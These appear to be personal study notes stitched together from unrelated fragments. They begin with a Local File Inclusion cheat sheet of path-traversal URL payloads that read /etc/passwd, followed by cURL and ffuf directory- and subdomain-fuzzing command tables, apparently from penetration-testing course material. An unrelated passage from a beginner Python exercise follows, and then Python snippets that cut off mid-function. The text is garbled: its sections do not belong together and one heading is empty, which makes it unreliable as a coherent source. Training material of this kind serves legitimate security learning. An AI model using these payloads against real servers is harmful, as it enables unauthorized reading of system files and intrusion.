Command | Description |
---|---|
Basic LFI | |
/index.php?language=/etc/passwd | Basic LFI |
/index.php?language=../../../../etc/passwd | LFI with path traversal |
/index.php?language=/../../../etc/passwd | LFI with name prefix |
/index.php?language=./languages/../../../../etc/passwd | LFI with approved path |
LFI Bypasses | |

Command | Description |
---|---|
curl -h | cURL help menu |
curl inlanefreight.com | Basic GET request |
curl -s -O inlanefreight.com/index.html | Download file |
curl -k https://inlanefreight.com | Skip HTTPS (SSL) certificate validation |
curl inlanefreight.com -v | Print full HTTP request/response details |
curl -I https://www.inlanefreight.com | Send HEAD request (only prints response headers) |

Command | Description |
---|---|
ffuf -h | ffuf help |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ | Directory Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ | Extension Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php | Page Fuzzing |
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v | Recursive Fuzzing |
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ | Sub-domain Fuzzing |

"""
There won't be any code in this exercise or the next one, so there's no What You Should See or Study Drills either.
In fact, this exercise is like one giant Study Drills. I'm going to have you do a review of what you have learned
so far.
First, go back through every exercise you have done so far and write down every word and symbol (another name for
"character") that you have used.
Make sure your list of symbols is complete.
Next to each word or symbol, write its name and what it does. If you can't find a name for a symbol in this book,

```python
def add(a, b):
    print(f"ADDING {a} + {b}")
    return a + b


def subtract(a, b):
    print(f"SUBTRACTING {a} - {b}")
    return a - b
```

```python
from sys import argv  # from module sys import object named argv

script, input_file = argv  # set the variables from command line


def print_all(f):  # defines variable that is a file and a function object ???
    print(f.read())  # what the function does: prints all that is written in (f)ile


def rewind(f: object) -> object:  # defines function
```